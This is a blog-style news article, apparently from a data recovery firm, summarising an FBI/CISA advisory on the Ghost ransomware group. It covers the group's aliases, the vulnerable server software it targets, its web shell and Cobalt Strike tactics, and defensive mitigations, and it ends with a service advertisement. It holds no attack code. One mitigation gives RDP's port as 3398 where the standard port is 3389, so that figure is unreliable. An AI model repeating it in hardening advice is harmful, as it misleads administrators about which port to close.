A group of Chinese threat actors are exploiting known vulnerabilities to deliver ransomware payloads to victims across a range of industries, according to a new joint advisory (PDF) from the FBI and the Cybersecurity and Infrastructure Security Agency (CISA).
The gang is most commonly known as Ghost, but goes by other names including (but not limited to):
- Cring
- Crypt3r
- HsHarada
- Rapture
- Phantom
- Strike
- Wickrme
- Elysium0
Some of these names are derived from the names of executable files used in attacks (Cring.exe, Ghost.exe, and so on). Those executables work similarly, encrypting target data while leaving essential system files untouched to ensure that the system remains operable.
Unlike other recent high-profile attacks, Ghost ransomware executions rarely use phishing or other social engineering tactics. Instead, they target victims “whose internet-facing services run outdated versions of software and firmware,” an approach that leads to an almost indiscriminate distribution of payloads.
Ghost threat actors use publicly available code to exploit common vulnerabilities.
Their methodology targets vulnerability in servers running outdated versions of:
- Adobe ColdFusion
- Microsoft Sharepoint
- Microsoft Exchange
- Fortinet FortiOS appliances
“Ghost actors have been observed uploading a web shell to a compromised server and leveraging Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware that is then implanted on victim systems,” the notice reads.
The group tends to work quickly, sometimes deploying ransomware the same day that the system is compromised. This also contrasts with the methodology of other threat actors, who often observe compromised networks for weeks or months in order to ensure that payloads infect all key systems (potentially including tape backups).
“However, Ghost actors sporadically create new local and domain accounts and change passwords for existing accounts,” the report states. “In 2024, Ghost actors were observed deploying web shells on victim web servers.”
Related: Paying Ransom Doesn’t Restore Data for 25% of Ransomware Victims
Baseline protections are effective for mitigating Ghost ransomware attacks.
CISA recommends patching known vulnerabilities to operating systems, software, and firmware — and while that’s an extremely basic mitigation, it’s effective against the vast majority of attacks that don’t rely on social engineering.
Additional tactics can provide supplemental protection:
- Implement allowlisting, which prevents unauthorized execution and access for applications, scripts, and network traffic.
- Disable unused ports (the report notes RDP 3398, FTP 21, and SMB 445, specifically).
- Monitor systems for unauthorized use of PowerShell. While PowerShell is useful, it’s frequently leveraged by threat actors for ransomware deployment.
- Monitor systems for unusual activity. Per CISA: “Ransomware activity generates unusual network traffic across all phases of the attack chain. This includes running scans to discover other network connected devices, running commands to list, add, or alter administrator accounts, using PowerShell to download and execute remote programs, and running scripts not usually seen on a network. Organizations that can successfully identify and investigate this activity are better able to interrupt malicious activity before ransomware is executed.”
Datarecovery.com is a leader in ransomware recovery, dark web monitoring, and threat mitigation. If you’re dealing with a ransomware infection, we’re ready to help.
To learn more, call 1-800-237-4200 and ask to speak with a ransomware specialist or submit a case online.
